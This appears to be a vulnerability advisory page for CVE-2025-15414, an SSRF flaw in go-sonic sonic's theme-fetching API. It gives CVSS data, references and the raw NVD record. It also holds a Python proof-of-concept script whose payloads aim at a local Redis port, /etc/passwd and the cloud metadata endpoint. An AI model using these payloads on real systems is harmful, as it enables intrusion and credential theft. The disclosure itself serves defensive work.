CVE-2025-15414

Description

A flaw has been found in go-sonic sonic up to 1.1.4. The affected element is the function FetchTheme of the file service/theme/git_fetcher.go of the component Theme Fetching API. Executing a manipulation of the argument uri can lead to server-side request forgery. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

go-sonic sonic <= 1.1.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15414 SSRF in go-sonic sonic FetchTheme function
# Affected: go-sonic sonic <= 1.1.4

import requests
import json

target = "http://target.com"

# PoC 1: Basic SSRF to internal service
payload_internal = {
    "uri": "http://localhost:6379/"
}

# PoC 2: Read local file
payload_file = {
    "uri": "file:///etc/passwd"
}

# PoC 3: Cloud metadata service (AWS/Azure/GCP)
payload_cloud = {
    "uri": "http://169.254.169.254/latest/meta-data/"
}

# Send malicious request
endpoint = f"{target}/api/theme/fetch"
response = requests.post(endpoint, json=payload_internal)

print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15414
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15414
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15414/
[4] VulDB https://vuldb.com/cve/CVE-2025-15414
[5] https://note-hxlab.wetolink.com/share/SeCdFaAVlHAJ
[6] https://note-hxlab.wetolink.com/share/SeCdFaAVlHAJ#-span--strong-proof-of-concept---strong---span-
[7] https://vuldb.com/?ctiid.339335
[8] https://vuldb.com/?id.339335
[9] https://vuldb.com/?submit.719789

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15414", "sourceIdentifier": "[email protected]", "published": "2026-01-01T22:15:42.623", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in go-sonic sonic up to 1.1.4. The affected element is the function FetchTheme of the file service/theme/git_fetcher.go of the component Theme Fetching API. Executing a manipulation of the argument uri can lead to server-side request forgery. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://note-hxlab.wetolink.com/share/SeCdFaAVlHAJ", "source": "[email protected]"}, {"url": "https://note-hxlab.wetolink.com/share/SeCdFaAVlHAJ#-span--strong-proof-of-concept---strong---span-", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.339335", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.339335", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.719789", "source": "[email protected]"}]}}